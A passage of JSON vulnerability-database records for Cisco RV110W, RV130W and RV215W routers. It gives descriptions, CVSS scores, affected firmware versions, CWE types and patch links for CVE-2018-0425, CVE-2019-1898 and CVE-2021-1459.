          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-rce-q3rxhnvm"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.1165"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1459"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/119.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-1459"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-451"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1459"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2021-1459"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-451"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1459"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1459"
          },
          {
            "date": "2021-04-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-451"
          },
          {
            "date": "2021-04-08T04:15:13.437000",
            "db": "NVD",
            "id": "CVE-2021-1459"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1459"
          },
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-451"
          },
          {
            "date": "2024-11-21T05:44:24.603000",
            "db": "NVD",
            "id": "CVE-2021-1459"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-451"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cisco To Small Business RV110W RV130W RV215W Input validation error vulnerability",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-451"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "input validation error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-451"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201810-0303

    Vulnerability from variot - Updated: 2024-11-23 22:34

    A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper access control to files within the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device. A successful exploit could allow the attacker to gain access to sensitive configuration information, including user authentication credentials. The RV110W is a Wireless-NVPN firewall router. The RV130W is a Wireless-N multi-function VPN router. The RV215W is a Wireless-NVPN router

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0303",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 1.4,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 1.4,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.44"
          },
          {
            "model": "rv215w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.0.8"
          },
          {
            "model": "rv110w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.1.7"
          },
          {
            "model": "rv130w wireless-n multifunction vpn routerr",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.0.1.3"
          },
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.3.0.8"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.2.1.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.0.2.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.0.0.21"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18071"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010562"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-264"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0425"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010562"
          }
        ]
      },
      "cve": "CVE-2018-0425",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-0425",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-18071",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-118627",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-0425",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-0425",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-0425",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-18071",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201809-264",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-118627",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18071"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118627"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010562"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-264"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0425"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper access control to files within the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device. A successful exploit could allow the attacker to gain access to sensitive configuration information, including user authentication credentials. The RV110W is a Wireless-NVPN firewall router. The RV130W is a Wireless-N multi-function VPN router. The RV215W is a Wireless-NVPN router",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-0425"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010562"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-18071"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118627"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-0425",
            "trust": 3.1
          },
          {
            "db": "SECTRACK",
            "id": "1041676",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010562",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-264",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-18071",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-118627",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18071"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118627"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010562"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-264"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0425"
          }
        ]
      },
      "id": "VAR-201810-0303",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18071"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118627"
          }
        ],
        "trust": 1.2914166040000001
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18071"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:34:06.421000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-20180905-rv-routers-disclosure",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-rv-routers-disclosure"
          },
          {
            "title": "CiscoRV110W, RV130W, RV215W Information Disclosure Vulnerability Patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/139763"
          },
          {
            "title": "Cisco RV110W Wireless-N VPN Firewall , RV130W Wireless-N Multifunction VPN Router  and RV215W Wireless-N VPN Router Repair measures for information disclosure vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=84595"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18071"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010562"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-264"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-200",
            "trust": 1.9
          },
          {
            "problemtype": "CWE-269",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-284",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-118627"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010562"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0425"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180905-rv-routers-disclosure"
          },
          {
            "trust": 1.7,
            "url": "http://www.securitytracker.com/id/1041676"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-0425"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0425"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18071"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118627"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010562"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-264"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0425"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-18071"
          },
          {
            "db": "VULHUB",
            "id": "VHN-118627"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010562"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-264"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-0425"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-09-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-18071"
          },
          {
            "date": "2018-10-05T00:00:00",
            "db": "VULHUB",
            "id": "VHN-118627"
          },
          {
            "date": "2018-12-18T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-010562"
          },
          {
            "date": "2018-09-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201809-264"
          },
          {
            "date": "2018-10-05T14:29:01.060000",
            "db": "NVD",
            "id": "CVE-2018-0425"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-09-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-18071"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-118627"
          },
          {
            "date": "2018-12-18T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-010562"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201809-264"
          },
          {
            "date": "2024-11-21T03:38:12.153000",
            "db": "NVD",
            "id": "CVE-2018-0425"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-264"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Cisco RV Product Vulnerable to information disclosure",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-010562"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "information disclosure",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201809-264"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201906-0689

    Vulnerability from variot - Updated: 2024-11-23 22:06

    A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file. The Cisco\302\256 RV110W and so on are all VPN firewall routers from Cisco. Successfully exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201906-0689",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w wireless-n multifunction vpn routerr",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18901"
          },
          {
            "db": "BID",
            "id": "108865"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005707"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1898"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005707"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jacob Baines of Tenable, Inc. .",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-796"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-1898",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2019-1898",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-18901",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-151380",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "NONE",
                "baseScore": 5.3,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 3.9,
                "id": "CVE-2019-1898",
                "impactScore": 1.4,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
